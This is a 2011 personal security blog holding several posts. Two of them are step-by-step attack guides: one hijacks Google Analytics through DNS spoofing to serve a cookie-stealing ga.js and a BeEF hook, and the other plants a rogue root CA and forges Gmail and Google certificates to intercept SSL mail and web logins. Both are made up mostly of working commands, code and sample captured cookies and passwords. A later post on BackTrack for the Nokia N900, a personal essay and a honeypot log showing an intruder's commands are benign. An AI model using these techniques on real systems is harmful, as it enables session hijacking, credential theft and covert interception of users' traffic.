SeventhOctober.net

sequel7's ramblings

Hijacking Google Analytics

without comments

The Rambling Intro

This is a fun one I came up with while looking at a site this week. I feel sure that somebody else must have come up with this before me, but I’ve never seen anyone blog about it or anything, so here goes.

The back story is that somebody posted a link to some “password strength checker” website, in which of course you type your password and it tells you how long it thinks it would take someone to crack it. Naturally, I find this to be a dumb idea, as you’re typing your password into some random website of some random guy you don’t know, and it didn’t even use SSL.

The site author explains that this isn’t a problem, because all the calculations are done in javascript, and no data is ever actually sent to his website. Alright, fine, even though the vast majority of users will never do this, I checked the code, and sure enough, no data goes to him, it’s all done in the browser. But… wait, he does use Google Analytics. Interesting.

Now the problem with the idea that it’s okay to type in a password on a website that doesn’t use SSL because it doesn’t ever send the data, is that the page can be manipulated. An attacker might change the form to actually submit the data somewhere, or he might inject javascript to actually record each key press and do the same, etc. The difficult part about pulling off an attack like that is that normally it means the attacker must have an actively maintained position as a man-in-the-middle for each target, replacing HTML content on the fly, and hoping he doesn’t noticeably break anything.

But what if there happened to already be a standalone chunk of javascript already included on roughly half the websites people use in the world? What if we could hijack that chunk of javascript with a fair amount less effort than keeping ettercap in place 24/7?

The Requirements

Alright, to pull this off, we still need a few things already accomplished. The only tough thing you have to pull off is getting control of the target’s DNS somehow. More specifically, we need to at least control the resolution to a single specific DNS record. There’s dozens of ways to do this, including, but not limited to..:

  • Actually being a man-in-the-midde, and using dnsspoof, ettercap, what have you.
  • Compromising the victim’s DNS server. Less likely if they’re using a major provider, but maybe you’re pen-testing an organization that runs one internally.
  • Add a record to the victim’s hosts file. This obviously requires some access already, but it would give you some additional permanence on a box, and help escalate you past what you have access to without their web passwords. It’s also not likely to be noticed if the victim doesn’t have some kind of file integrity tripwire set up.
  • Changing the DNS server on a router. Easy to do on your average home wireless router run by the inept, and still possible if an organization hasn’t properly secured their routers.
  • Run a fake DHCP server, and hand out your DNS server’s address to clients. This can go along well with PwnPlugs, for example.

So once we can do that, we just need to get their browser to believe that “www.google-analytics.com”, aka “www-google-analytics.l.google.com”, is at an IP address where we have a web server running on port 80.

Interestingly, Google makes this easy for us, in that we don’t have to worry about SSL, or certificate errors. We probably don’t have a way to make our web server’s SSL certificate match the one for Google’s, but that’s okay. In the javascript included on web pages that use it, Google Analytics actually checks to see if the site is being accessed via SSL, and if so, it calls the Analytics code from an entirely different host name, ssl.google-analytics.com, rather than www.

This means that if the victim accesses a site using Google Analytics over SSL from the start, we don’t get access, but the user also doesn’t get alerted. However, if the site initially loads unencrypted, we can hijack things and replace any links to https with regular http links from then on out.

The Fake DNS Server

For this demonstration, I’m going to assume we have successfully changed the DNS server of our victim. Again, this isn’t strictly necessary, but it’s the method I’m going to discuss in this post. As always, there are a dozen ways to do even this step, but in this instance I’m going to use a modified version of a modified version of the fake DNS server in the ever glorious Metasploit.

The problem with the fake DNS server included in Metasploit is that it will respond to all DNS queries with a single IP address, with the exception of specified domains which it will resolve normally. We want to do the exact opposite: Resolve all queries normally, with the exception of a specified domain, which we will be hijacking. Fortunately, a modified version of the Metasploit DNS server has been posted here, and it will do just that. Unfortunately, it’s broken.

Since that module was posted years ago, a lot of things have changed in Metasploit, and the module doesn’t work quite right now. The good news is, it’s easy to fix. Download the file from his website from here, or my mirror from here. Once you have the module, put it into your “modules/auxiliary/server/” directory inside Metasploit. In my case, that makes it /opt/framework3/msf3/modules/auxiliary/server/mitm_fakedns.rb, but yours may be different, especially if you installed MSF after it hit version 4.

Now you can either try and fix it yourself so that Metasploit doesn’t complain about it being formatted wrong, or you can just download my patch for it and fix it.

curl http://www.seventhoctober.net/mitm_fakedns.rb.patch | patch mitm_fakedns.rb

Metasploit should now be able to load and work with the module. The module requires two options set, one for the legitimate DNS server to forward most requests to, and one for a file containing a list of regular expressions to tell the module which DNS responses to mess with. For the first, pick any DNS server you like. For the second, create a file like so, replacing 127.0.0.1 with your external IP address:

echo 127.0.0.1,www-google-analytics.l.google.com > /root/hosts_spoof

You may note that this is not exactly a record for www.google-analytics.com. This threw me off a little bit at first, until I realized that this module does not run the given regex against the DNS requests, but rather the DNS responses from the legitimate server. Since a request for www.google-analytics.com actually returns a canonical name of www-google-analytics.l.google.com, we must make that our expression to match and be modified.

Incidentally, the URL looks vaguely like it might be a load balanced response, but I was unable to get any other answers back in the short time that I was messing with it. Keep that in mind, and in case yours doesn’t work for some reason, check that this is the response you are getting. If anybody knows more about that, I’d be interested in hearing from you.

Next, start the DNS server module with something like the following:

msfcli auxiliary/server/mitm_fakedns filename=/root/hosts_spoof realdns=8.8.8.8 E

And check that it is working with a query like:

dig @127.0.0.1 www.google-analytics.com

If all went well, it should return your own IP address in the record.

The Evil JavaScript

At this point, you can run any old web server with any old villainous javascript, so long as the server runs on port 80, and the javascript is hosted at /ga.js. Just about every website that uses Google Analytics will happily execute your javascript in the context of the page that loads it. Have fun!

Being that this is both an explanatory and a demo post, let’s specifically discuss a couple methods of actually abusing this technique. Firstly, let’s do a simple cross site cookie stealer. Since our javascript is running on the pages of the victims, we have access to the cookies of any page it runs on. As it turns out, this includes sites like Twitter, and WordPress.

Assuming you have a web server than can run PHP, create a couple of files that look something like the following:

[root html]# cat xss.php
<?php
$xssLog = “xss.log”;
$filehandler = fopen($xssLog, ‘a’) or die(“Cannot open file.”);
$writeString = $_SERVER[“REMOTE_ADDR”] . ” – ” . $_SERVER[“HTTP_USER_AGENT”] . ” – Referrer: ” . $_SERVER[“HTTP_REFERER”] . ” – Cookie: ” . $_GET[“cookie”] . “\n”;
fwrite($filehandler, $writeString);
fclose($fh);
?>

[root html]# cat ga.js
new Image().src=”http://YOUR_SERVER_ADDRESS/xss.php?cookie=”+encodeURI(document.cookie);

Next you’ll want to create a file for stuff to be logged to, and make sure the web server can write to it. This command may vary, based on your web server, or you can just chmod it. This is probably a slightly safer approach though:

[root html]# touch xss.log
[root html]# chown apache:apache xss.log

Once these are up, any time a victim visits any web page that uses Google Analytics, you should automatically get a record of it along with their cookies.

[root html]# cat xss.log
12.120.184.8 – Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0.1) Gecko/20100101 Firefox/5.0.1 – Referrer: http://twitter.com/ – Cookie: k=10.25.435.167.1321234567890349; guest_id=v1%3A132061234567865685; original_referer=8bhz%2B%2ByebvgRkMMFCXx%2FCUOEvDoVeFTl; twid=u%3D412345908%7CTcf4XaVwruflsKyq5xgPpcA%2mwNw%3D; twll=l%3D1234616679; lang=en; js=1

Using Burp, or whatever your favorite tool is, you can use these cookies to become your victim on whatever website they browsed to.

The BeEF

Have you heard of BeEF? Now you have. Basically put, BeEF is a tool designed to help security people demonstrate exactly how serious these kinds of attacks can be. It acts as a web server, hosting a control panel for you, and some javascript for your victims. BeEF lets us get a little more… interactive.

BackTrack comes with BeEF installed, and it might actually work out of the box. Mine didn’t, and yours probably won’t, but I’m not helping you fix yours here if it’s broken. Come back when it’s working. :-)

Before we start BeEF, we need to make a couple changes to the config. On my system, the config file is located at “/pentest/web/beef/config.yaml”. Find and open that file. Find the http section, and replace the port and hook_file to look like so:

http:

host: “0.0.0.0”
port: “80”
# if running behind a nat set the public ip address here
#public: “”
dns: “localhost”
panel_path: “/ui/panel”
hook_file: “/ga.js”
hook_session_name: “BEEFHOOK”
session_cookie_name: “BEEFSESSION”

Now start up BeEF…

[email protected]:/pentest/web/beef# ./beef
[15:14:23][*] Browser Exploitation Framework (BeEF)
[15:14:23] | Version 0.4.2.11-alpha
[15:14:23] | Website http://beefproject.com
[15:14:23] | Run ‘beef -h’ for basic help.
[15:14:23] |_ Run ‘svn update’ to update to the latest revision.
[15:14:25][*] BeEF is loading. Wait a few seconds…
[snip…]
[15:14:29][+] running on network interface: 127.0.1.1
[15:14:29] | Hook URL: http://127.0.1.1:80/ga.js
[15:14:29] |_ UI URL: http://127.0.1.1:80/ui/panel
[snip…]

As you hopefully noticed, you can find your control panel at http://127.0.1.1:80/ui/panel. I’ll leave you to figure out the default credentials, but you should probably change them anyway, in “beef/extensions/admin_ui/config.yaml”. Once you’re in, as soon as a victim has browsed to a site that uses Google Analytics, you should see them show up in your control panel.

Once a victim is in your control panel, you can browse through the commands tab to see all the nasty things you can do to them. Among such possibilities are:

  • Keylogging for everything typed on the page, including passwords.
  • Page redirection, including the ability to redirect using an iFrame, so as not to change the URL in the address bar.
  • Rickrolling. See previous.
  • Sending Java payloads to the client.
  • Making HTTP requests from the victim’s browser.
  • Stealing cookies associated with the page.
  • Making Skype calls.
  • Getting the current geographical location of the victim.
  • Determining if the victim is using Tor.
  • Determining if the victim is signed into social networks.
  • Running arbitrary raw javascript.

… and lots more. BeEF is fun, and it’s just one of the javascript exploit frameworks out there. Happy hunting!

Written by sequel7

November 6th, 2011 at 6:11 pm

Posted in Hacking

SSL MITM with an inserted CA and a DNS hijack

without comments

Alright, so it’s time for my bi-annual blog post. The topic of this post is nothing new or shocking or deeply hi tech, but it’s cool and fun. Although I hear the dangers of trusting a fake certificate authority and the horrors of DNS spoofing talked about all the time, I almost never hear anyone talk about real ways to actually abuse them. As it turns out, if you can combine the two, you can end up with some seriously nasty man-in-the-middle abilities. For the record, I am assuming for this post that you are using BackTrack 5. All of this should work on any machine with these tools, but BT5 is what I am testing on.

There has been a lot of talk lately about the problems with SSL, some theoretical, some practical. For example, a lot of browsers trust CAs like “TÜRKTRUST Elektronik Sertifika Hizmet Sağlayıcısı”. Who the heck is that, and why would I want to trust a certificate they signed? I bet you can’t tell me without the assistance of a search engine. Just as interestingly, and the topic of today, would you notice if someone had inserted a random certificate authority of their own on your machine? And what could they really do to you if they did?

The goal of this attack is to transparently sniff a target’s SSL traffic, without triggering an SSL error on their screen. If you can pull this off, you gain access to a lot of things. HTTP (bank, webmail, company user portal, etc), SMTP, IMAP, POP, RDP, IRC, other instant messengers, certain SSL based VPNs, etc. We trust a LOT of things to SSL, and all of it falls down if someone can convince a client machine that an arbitrary SSL certificate is valid.

So the basic assumption for this attack is that you have managed to get your own certificate authority installed on someones machine, and that you have a way of redirecting their traffic to a server you control. One of the simplest ways this might happen is that you have gotten a shell on their box using some other exploitation method (perhaps even sitting down with a thumbdrive), uploaded a certificate and ran two commands to add the certificate to the store and an entry to the DNS hosts file.

C:\Users\sequel7\Desktop>certutil -addstore Root fakeca.der
C:\Users\sequel7\Desktop>echo 10.13.37.42 www.google.com mail.google.com imap.gmail.com www.gmail.com pop.gmail.com smtp.gmail.com >> c:\windows\system32\drivers\etc\hosts

Ta-da, so now all traffic to anything we care about at gmail.com will be redirected to our server, as well as www.google.com itself and mail.google.com, so that we can sniff webmail. A better way to do the redirection would be to set up our own fake DNS server, and set that as the primary DNS server on the target, with a normal DNS server as the secondary. This way, we only need access to the target once, and from then on we can change which server we are hijacking at will. Once the attack is finished, we shut down our server and move on, and it may be some time before anyone notices that the primary DNS server is illegitimate. You could do the same if you’ve got access to the target’s router (linksys/admin anyone?). But for now, the hosts file works fine.

A couple of things to note: Certutil.exe seems to come by default on Vista/Seven machines, but not XP. I haven’t tested this thoroughly, so I could be wrong. Either way, you should be able to upload it on machines that are missing it, or if you feel like figuring it out you can use VB.NET or PowerShell. Also, this does not add your CA to Mozilla’s database, so you will have find Mozilla’s own version of certutil (which is indeed out there) if you plan to hijack Firefox and Thunderbird. Of course, if you happen to be sitting at the victim’s machine (your boss left his screen unlocked again?), you can just click on stuff.

So having established how to get the CA cert on the victim, how do we create it to begin with? Easy stuff. I’m going to use AOL as an example here, because it’s fun to pick on them, and I don’t have to scroll down to find their certificates. VeriSign might be a more interesting one to pick for practical purposes though. Who’s going to question VeriSign? Also, note that I will only be making any of these certificates valid for 10 days. I’m assuming you will be using this guide for legitimate penetration testing, and so if you forget to clean up after yourself, this will prevent someone else from stealing your keys and using your already inserted rogue CAs against your client.

[email protected]:~/fakeca# openssl req -new -x509 -extensions v3_ca -keyout fakeca.key -out fakeca.crt -days 10 -nodes
Generating a 1024 bit RSA private key
……….++++++
……….++++++
writing new private key to ‘fakeca.key’
—–
[snip]
—–
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:.
Locality Name (eg, city) []:.
Organization Name (eg, company) [Internet Widgits Pty Ltd]:America Online Inc.
Organizational Unit Name (eg, section) []:.
Common Name (eg, YOUR name) []:America Online Root Certification Authority 42
Email Address []:

Then we convert the cert to DER format so that Windows is happy…

[email protected]:~/fakeca# openssl x509 -in fakeca.crt -outform DER -out fakeca.der

Then we copy the cert and the key into a single file for convenience sake…

[email protected]:~/fakeca# cat fakeca.crt fakeca.key > fakeca.pem

And now we have our certificate authority. The fakeca.der is the file that you need to copy to your target box and con into trusting.

Now we need to go about using that CA to create certificates for our fake server. Remember, if we own the target’s DNS, since we’ve gotten them to trust our CA, we can switch targets as often as we want by simply generating a new server certificate and changing which address our evil DNS server is lying about. Today we are targeting Gmail, but really this will work for nearly anything. First we generate the key and certificate signing request.

[email protected]:~/fakeca# openssl req -new -nodes -keyout fakegmail.key -out fakegmail.csr -days 10
Generating a 1024 bit RSA private key
……….++++++
……….++++++
writing new private key to ‘fakegmail.key’
—–
[snip]
—–
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:California
Locality Name (eg, city) []:Mountain View
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Google Inc
Organizational Unit Name (eg, section) []:.
Common Name (eg, YOUR name) []:*.gmail.com
Email Address []:

Please enter the following ‘extra’ attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

Specifically note the wildcard common name. This allows us to hijack imap.gmail.com, pop.gmail.com, and smtp.gmail.com all at once. We will need to generate another certificate in a moment for *.google.com, so as to steal webmail. First, we need to use our fake CA to sign the fake Gmail key.

[email protected]:~/fakeca# openssl x509 -CA fakeca.pem -set_serial 1 -req -in fakegmail.csr -days 10 -out fakegmail.crt
Signature ok
subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=*.gmail.com
Getting CA Private Key

And once again combine the certificate and the key into a single file for convenience sake.

[email protected]:~/fakeca# cat fakegmail.crt fakegmail.key > fakegmail.pem

And now let’s repeat the whole process and get a certificate for *.google.com.

[email protected]:~/fakeca# openssl req -new -nodes -keyout fakegoogle.key -out fakegoogle.csr -days 10
Generating a 1024 bit RSA private key
……….++++++
……….++++++
writing new private key to ‘fakegoogle.key’
—–
[snip]
—–
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:California
Locality Name (eg, city) []:Mountain View
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Google Inc
Organizational Unit Name (eg, section) []:.
Common Name (eg, YOUR name) []:*.google.com
Email Address []:

Please enter the following ‘extra’ attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
[email protected]:~/fakeca#
[email protected]:~/fakeca# openssl x509 -CA fakeca.pem -set_serial 1 -req -in fakegoogle.csr -days 10 -out fakegoogle.crt
Signature ok
subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=*.google.com
Getting CA Private Key
[email protected]:~/fakeca#
[email protected]:~/fakeca# cat fakegoogle.crt fakegoogle.key > fakegoogle.pem

Alright so now we have our fake certificate authority, our fake gmail.com certificate, and our fake google.com certificate. How do we actually do the man-in-the-middle part? Well, I tried a few ways of doing this, some work and some don’t, but I think the easiest way of doing the non-HTTP services is to just use Stunnel.

Stunnel, in short, is designed to work as an SSL conversion proxy. It either takes SSL in and proxies it out as plain text, or takes in plain text and proxies it out as SSL. So we could just set it to accept SSL on our evil server and proxy it as plain text to the real server… but I would rather not be giving out my target’s plain text to anybody but me and the intended server. Again, I’m assuming your purpose is a legitimate penetration test, so we can’t be downgrading our client’s security under the excuse of testing them. Or, if you’re a black hat, maybe you just don’t want anyone else stealing your ill-gotten passwords. So since Stunnel only supports converting SSL to plain or plain to SSL, what to do?

Why, we run Stunnel twice, of course! If we run Stunnel in SSL server mode, using our fake certificate, our target will connect to us, and Stunnel will decrypt all the communications. If we then run Stunnel in SSL client mode as well, and have the Stunnel server dump the decrypted communications into the Stunnel client, we can have the Stunnel client then re-encrypt it all and ferry it out to the legitimate server, who will be none the wiser as we happily listen in on everything.

Since SSL encryption requires the use of static IP addresses (for reasons you should probably understand before attempting this all), we can easily use nslookup or whatever you prefer to find the IP addresses for Stunnel to ferry data to. As I have already done that, here are example configuration files for both the Stunnel server and client.

stunnel-server.conf:

; make sure that “cert” is set to your fake CA .pem file
cert = /root/fakeca/fakegmail.pem
; note, sslVersion must be set to “all” in order
; to hijack sessions that use TLS, such as imap
sslVersion = all
chroot = /usr/local/var/lib/stunnel/
setuid = nobody
setgid = nogroup
pid = /stunnel.pid
socket = l:TCP_NODELAY=1
socket = r:TCP_NODELAY=1

[pop3s]
accept = 995
connect = 127.0.0.1:110

[imaps]
accept = 993
connect = 127.0.0.1:143

[ssmtp]
accept = 465
connect = 127.0.0.1:25

[ssmtp2]
accept = 587
connect = 127.0.0.1:25

stunnel-client.conf:

sslVersion = SSLv3
chroot = /usr/local/var/lib/stunnel/
setuid = nobody
setgid = nogroup
pid = /stunnel.pid
socket = l:TCP_NODELAY=1
socket = r:TCP_NODELAY=1
; SSL client mode
client = yes

[pop3s]
accept = 110
connect = 74.125.67.109:995

[imaps]
accept = 143
connect = 74.125.47.109:993

[ssmtp]
accept = 25
connect = 74.125.159.109:465

And now run Stunnel and check to make sure it started properly.

[email protected]:~/fakeca# stunnel stunnel-server.conf
[email protected]:~/fakeca# stunnel stunnel-client.conf
[email protected]:~#
[email protected]:~/fakeca# lsof -i -P -n|grep stunnel
stunnel 4954 nobody 11u IPv4 46410 0t0 TCP *:995 (LISTEN)
stunnel 4954 nobody 12u IPv4 46411 0t0 TCP *:993 (LISTEN)
stunnel 4954 nobody 13u IPv4 46412 0t0 TCP *:465 (LISTEN)
stunnel 4954 nobody 14u IPv4 46413 0t0 TCP *:587 (LISTEN)
stunnel 4968 nobody 11u IPv4 46455 0t0 TCP *:110 (LISTEN)
stunnel 4968 nobody 12u IPv4 46456 0t0 TCP *:143 (LISTEN)
stunnel 4968 nobody 13u IPv4 46457 0t0 TCP *:25 (LISTEN)

Now, how do we actually see what it sniffs? Easily enough, since all of the plaintext will be going right over our own local interface. We can use Wireshark, dsniff, ettercap in sniff only mode, whatever happens to be your favorite tool to sniff things. And we don’t have to limit ourselves to sniffing passwords either, we can sniff the entirety of every email conversation too, should you choose to use one of those tools. As one example:

[email protected]:~# tshark -n -i lo -R imap
Running as user “root” and group “root”. This could be dangerous.
Capturing on lo
0.000000 127.0.0.1 -> 127.0.0.1 IMAP 106 Request: yx5k LOGIN “[email protected]” “passw0rd

Okay great, so that’s now going to happily intercept IMAP, POP3, and SMTP. But what about HTTP? For the most part, you could actually just grab HTTP and HTTPS exactly the same way, by adding ports 80 and 443 into the example Stunnel configurations. But HTTP can actually be a bit more picky sometimes about which virtual host it asked for, and which IP it ended up at, etc. Because of this, rather than just straight up forwarding the sessions with Stunnel, I ended up using webmitm, part of the dsniff suite of tools.

Webmitm, believe it or not, is a web man in the middle tool. It actually works quite well for what it does, though I find it lacking a little in flexibility. Webmitm needs to use the file “webmitm.crt” from whatever directory you start it in, and it will listen on ports 80 and 443 or die. Also, it cannot output logs to a file by itself, and redirecting stdout and stderr seem to have no effect. A workaround for this problem is no stick it in nohup, and just tail -f nohup.out. You could also use sslstrip or ssldump along with webmitm, or squid instead of webmitm, but this way seems easiest and least likely to give you a headache.

So to use webmitm, first copy your google.com certificate to webmitm.crt.

[email protected]:~/fakeca# cp fakegoogle.pem webmitm.crt

Then start webmitm using nohup and two -d flags. One -d only shows basic information, two -d’s will show you all HTTP POSTs, and three -d’s will give you the entire HTTP session. You can use three if you want, it’s your time, eyeballs, and disk space.

[email protected]:~/fakeca# nohup webmitm -dd &
[1] 31337
[email protected]:~/fakeca# nohup: ignoring input and appending output to `nohup.out’
[email protected]:~/fakeca# tail -f nohup.out
webmitm: relaying transparently
[snip]
charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0
%84&lsd=aBIeX&locale=en_US&email=bob&pass=passw0rd
&default_persistent=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=aBIeX

Imagine if you got domain admin on a network and pulled off this trick. You could push out the fake CA and change the DNS settings for an entire enterprise, and sniff every email, instant message, RDP session, and password for every employee in the entire company, completely without SSL warnings.

That’s about it. I hope I’ve explained this well, I hope it helps someone (ideally someone with good intent), and I apologize for my long winded rambling. If you have any comments, questions, insults, suggestions, or corrections, please feel free to leave them in the comment box. Take care!

Written by sequel7

August 14th, 2011 at 6:02 pm

Posted in Hacking,IT Security

BackTrack 5 on Nokia N900

with 12 comments

BackTrack 5 is awesome. The N900 is (once again) awesome. Now they can be awesome together. Here’s how…

Before I start, lemme give credit where credit is due. The BackTrack and OffSec teams are also awesome. The script I’m using came straight out of their BT5 ARM image, with just a few adjustments to work on the N900. You can and should download BackTrack here – http://www.backtrack-linux.org/downloads/

Furthermore, the guys at http://talk.maemo.org/showthread.php?t=72933 had this working days before I did. My method is only slightly different than theirs, but I like mine better because it uses the script straight from the image. I’m also going to mention a couple things they didn’t.

On to the instructions…

  1. You must have rooted your N900. If you don’t know how to root your N900, this post is not for you.
  2. You must be running the power users kernel. Since I wanted to do this install with a clean flash of my N900, I spent a fair chunk of three days trying to figure out how to solve the “exec format error” problem. It turns out that this kernel fixes it easy. Just run `apt-get install kernel-power*`, and all will be well.
  3. You must have space to put the BT5 image, and it must be on a file system that allows for large files. The default file system on your memory card won’t cut it. I chose to reformat my memory cards partition into ext3, but you can do whatever you like.
    • The easiest way to do this is `mkfs.ext3 <partition name>`. Beware, this will wipe the partition, so make sure there’s nothing important on it, and make sure you’re wiping the right one. It’s probably /dev/mmcblk1p1.
    • Then you’ll want to mount that partition somewhere. I chose to mount it in /media. To do this, `mkdir /media/mmc1; mount /dev/mmcblk1p1 /media/mmc1`. You may want to see the next list item first though.
  4. Now you’ll need to copy the bt5.img file into /media/mmc1 somehow or other. I chose to copy it over USB by mounting the media card in my Linux laptop, as I’ve found that wirelessly transferring large files on my N900 is iffy at best. Note, you won’t be able to mount the card on your laptop while it’s mounted in Maemo on your N900. Also note, check the frigging md5sum if you don’t want to bang your head on the wall a lot.
  5. In the same directory as the bt5.img file, you’ll want to have the bootbt script. I’ve slightly modified it to work in our situation, instead of Android. Rather than fight with WordPress’ formatting, I’ll just link you to it. http://pastie.org/1907031
  6. If your locations or partition are any different, you may need to edit that script. Basically it is set up to create /media/mmc1/bt5mnt if it doesn’t exist, and then mount ./bt5.img on it. I suppose it could probably be changed to create ./bt5mnt instead, but I already pasted the script, so that’s your problem.
  7. Run the script. `bash ./bootbt`, or `chmod +x ./bootbt; ./bootbt`, or whatever. I don’t care. If neither of us forgot anything, it should chroot you right on into BT5, and you’ll get the red prompt text.  If you want to just run command line stuff, you’re done!
  8. Next up is if you want to run VNC. Which you do, obviously, if only to get that awesome dragon wallpaper on your N900. You’ll want to edit /usr/bin/startvnc and change the geometry to 800×480. I prefer using nano to do this, but apparently I’m not as leet as the vi cultists, who can bite me.
  9. Change your vnc password using `vncpasswd`.
  10. If you couldn’t guess this from the previous steps… run /usr/bin/startvnc. Errors are normal btw, we’re running Linux, remember?
  11. If you don’t already have one, you’ll need a vnc client. From a terminal window outside your BT5 chroot, try `apt-get install presencevnc`. It seems to work better for me than vncviewer. Run it, and connect to 127.0.0.1. Don’t forget to specify 5901 as your port, if it gives you trouble. Note, to use capital letters and symbols in the VNC client, you have to actually hold the shift/function key while you press the letter.
  12. Tada.
  13. Edit: Another point of interest. If you, as I did, begin to have problems with running out of memory, you’ll need to add a swap partition. It makes stuff go a lot smoother. I used gparted on my laptop to shrink my memory card’s ext3 parition down a bit and added a 2GB swap partition (overkill, but why not). Then you can either add it in /etc/fstab on your N900, or use the quick and dirty way of `swapon /dev/mmcblk1p2` or whatever your partition is. Run `free` to find out if it worked.
  14. Edit 2: Regarding the previous item, MarshmallowGoat pointed out in the comments that we can probably just use a swap file instead of creating a whole partition, something I hadn’t thought of. A how to is posted here – https://wiki.archlinux.org/index.php/Swap#Swap_file

I don’t think I missed anything, but if I did, lemme know and I’ll try to help.

I should also note that some of you will want to try extracting the .img straight to the file system and running it from there instead. That should be faster, but I haven’t tried it yet. It won’t require a lot of changes from these steps, but I don’t want to post any guides until if and when I’ve tried it myself. By that time, I expect someone else will have beaten me to it anyway.

Written by sequel7

May 15th, 2011 at 7:55 pm

Self-Image

with one comment

So yeah, it’s been awhile since I posted on this. I had all kinds of grand dreams for this blog, but it turns out I don’t trust the internet enough to share most of the things I would post, and I’m too busy right now to do anything strictly productive that I’m allowed to share. Insert promises of a one day renewed effort <here>. Frigging school, wasting all my time when I could be spending it learning things.

Anyway, on to the post itself. One of my assignments for school this week was to analyze a book and write a paper about it. What book it was is irrelevant, as is most of the paper I wrote. I am however going to copy a small section of it to here, as I was reasonably pleased with the way I said it. I feel it offers some potentially constructive insight into me as a person, and I hope that perhaps it can help others who maybe struggle with their own “self image”.



</blah blah blah boring paper blah blah blah>

During my childhood and up through nearly all of high school, I was the type of guy that was always mimicking the people I admired and respected. I was in many ways a shape shifter, with no true form or identity of my own. Every time my environment changed, be it from my family moving, or changing schools or churches, I would find a person I wanted to be like, and I would emulate them in nearly every way.

I would model my taste in music, hobbies, eventually vehicles, and almost everything else after whoever I looked up to at the time. Looking back on it, I find that I sometimes became more like the image of what I thought I wanted to be than my role models themselves were, if that makes any sense at all. Unfortunately, as was inevitable, each of these heroes eventually let me down. Sometimes this was their fault, sometimes it was my own, but regardless, the net effect was that I never felt secure in who I was. Everyone I wanted to be like turned out to be flawed.

Eventually, not long before graduated high school a few years ago, I learned that it was better to just find out who I was, and be that person. It took work and experimentation, but I found things that I could ground myself in. I can look at me as a person and say these things are who I am. It helps me tremendously to be able to point at those parts of my identity, and I can hold on to them whenever anything else seems shaky. When I am laughed at for my quirks, I find that I can let it roll off of me, because I am actually comfortable with who I am.

By way of example, I wear nothing but straight black clothing all day of every day. Sure, occasionally I get laughed at for it, and lots of people give me odd looks when I walk down a sidewalk, but I like it, and it is part of my identity. Somehow having that part of me lets me not worry so much about other things, like if my hair looks stupid today or if I have a weird looking cold sore on my mouth.

Furthermore, I identify myself as a professional computer hacker and amateur StarCraft II enthusiast. I practice legally hacking computers so as to understand how they are vulnerable to evil hackers, so that I can better teach people how to fix them, and that makes me awesome. I also play StarCraft II, and am statistically among the top 8% of the four and a half million players worldwide, which also contributes to my awesomeness. Being anchored in these two things lets me never have to worry about not being good anything else I might have worried about in the past, like being terrible at sports, or awful at math.

Most importantly, as of a couple years ago I have been able to identify myself as a husband. On days when nearly everything else seems meaningless, and no one else seems to be around, I can always ground myself in the fact that I have a wife to care for and who loves me. It’s hard to find something bad enough in the world to make you forget something like that.

<blah blah blah boring paper blah blah blah>


Written by sequel7

March 11th, 2011 at 11:11 pm

Posted in General

O RLY?

with 3 comments

It would appear that my first shot at a honeypot has been an amusing success :-)

www:~# w
13:27:54 up 14 days,  3:53,  1 user,  load average: 0.08, 0.02, 0.01
USER     TTY      FROM              [email protected] IDLE   JCPU   PCPU WHAT
root     pts/0    77.28.252.122     13:27    0.00s  0.00s  0.00s w
www:~# ls
www:~# uptime
13:28:00 up 14 days,  3:53,  0 users,  load average: 0.08, 0.02, 0.01
www:~# wget
wget: missing URL
Usage: wget [OPTION]… [URL]…

Try `wget –help’ for more options.
www:~# cat /proc/cpuinfo
processor    : 0
vendor_id    : GenuineIntel
cpu family    : 6
model        : 23
model name    : Intel(R) Core(TM)2 Duo CPU     E8200  @ 2.66GHz
stepping    : 6
cpu MHz        : 2133.305
cache size    : 6144 KB
physical id    : 0
siblings    : 2
core id        : 0
cpu cores    : 2
apicid        : 0
initial apicid    : 0
fpu        : yes
fpu_exception    : yes
cpuid level    : 10
wp        : yes
flags        : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips    : 4270.03
clflush size    : 64
cache_alignment    : 64
address sizes    : 36 bits physical, 48 bits virtual
power management:

processor    : 1
vendor_id    : GenuineIntel
cpu family    : 6
model        : 23
model name    : Intel(R) Core(TM)2 Duo CPU     E8200  @ 2.66GHz
stepping    : 6
cpu MHz        : 2133.305
cache size    : 6144 KB
physical id    : 0
siblings    : 2
core id        : 1
cpu cores    : 2
apicid        : 1
initial apicid    : 1
fpu        : yes
fpu_exception    : yes
cpuid level    : 10
wp        : yes
flags        : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips    : 4266.61
clflush size    : 64
cache_alignment    : 64
address sizes    : 36 bits physical, 48 bits virtual
power management:

www:~# wget
wget: missing URL
Usage: wget [OPTION]… [URL]…

Try `wget –help’ for more options.
www:~# passwd
Enter new UNIX password: islamizacija54321
Retype new UNIX password: islamizacija54321
Sorry, passwords do not match
passwd: Authentication information cannot be recovered
passwd: password unchanged
www:~# passwd
Enter new UNIX password: islamizacija54321
Retype new UNIX password: islamizacija54321
Sorry, passwords do not match
passwd: Authentication information cannot be recovered
passwd: password unchanged
www:~# /usr/sbin/useradd -o -u 0 user
Adding user `user’ …
Adding new group `user’ (1001) …
Adding new user `user’ (1001) with group `user’ …
Creating home directory `/home/user’ …
Copying files from `/etc/skel’ …
Password: islamizacija54321
Password again: islamizacija54321

